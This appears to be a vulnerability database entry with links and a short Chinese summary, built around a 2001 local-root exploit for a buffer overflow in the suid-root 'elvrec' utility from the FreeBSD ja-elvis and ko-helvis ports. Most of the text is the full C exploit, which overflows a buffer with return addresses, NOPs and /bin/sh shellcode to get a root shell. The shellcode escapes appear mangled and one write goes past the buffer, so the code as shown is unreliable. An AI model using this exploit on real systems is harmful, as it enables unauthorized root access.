https://www.exploit-db.com/exploits/287
https://www.securityfocus.com/bid/83022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-007

elvis的ja-elvis和ko-helvis端口存在缓冲区溢出漏洞。本地用户利用该漏洞获取根特权。

/*
 * ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
 *
 * vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
 * 
 * The above two packages contain a file recovery utility 'elvrec', installed
 * suid root(4755) by default. The utility is subject to a buffer overflow 
 * leading to root privileges:
 *
 * Usage: ./elvwreck <offset> <alignment>
 * 
 * [email protected] // www.synnergy.net
 * 28 Feb 2001.
 *
 */ 

#include <stdio.h>
#include <stdlib.h>
#define PROG	"/usr/local/bin/elvrec"
#define VULN	608
#define BSIZE	1024
#define NOP	0x90
#define ESP	0xbfbff92c	// FreeBSD 4.2
#define OFFSET	0
#define EATME	1		// byte alignment

char shellcode[]= 
  "xebx37x5ex31xc0x88x46xfax89x46xf5x89x36x89x76"
  "x04x89x76x08x83x06x10x83x46x04x18x83x46x08x1b"
  "x89x46x0cx88x46x17x88x46x1ax88x46x1dx50x56xff"
  "x36xb0x3bx50x90x9ax01x01x01x01x07x07xe8xc4xff"
  "xffxffx02x02x02x02x02x02x02x02x02x02x02x02x02"
  "x02x02x02/bin/sh.-c.sh";

int main(int argc, char *argv[]) {
  char buffer[BSIZE];
  long address=ESP;
  int i, offset, align;

  if(argc > 1) { offset = atoi(argv[1]); align = atoi(argv[2]); } 
  else { offset = OFFSET; align = EATME; }

  address += offset;
  fprintf(stderr, "n* using ret %#x -> align %d -> offset %dnn", address, align, offset); 

  for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
  for(i=VULN; i<(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
  memcpy(buffer+i, shellcode, strlen(shellcode));
  buffer[BSIZE] = '';

  if(execlp(PROG, "elvrec", buffer, 0)) {
    fprintf(stderr, "Unable to execute %snn", PROG);
    exit(1);
  }
}


// milw0rm.com [2001-03-03]

Ko-Helvis Ko-Helvis 1.8H2 1

Ja-Elvis Ja-Elvis 1.8.4 1

来源:FREEBSD
名称:FreeBSD-SA-01:21
链接:http://archives.neohapsis.com/archives/freebsd/2001-02/0082.html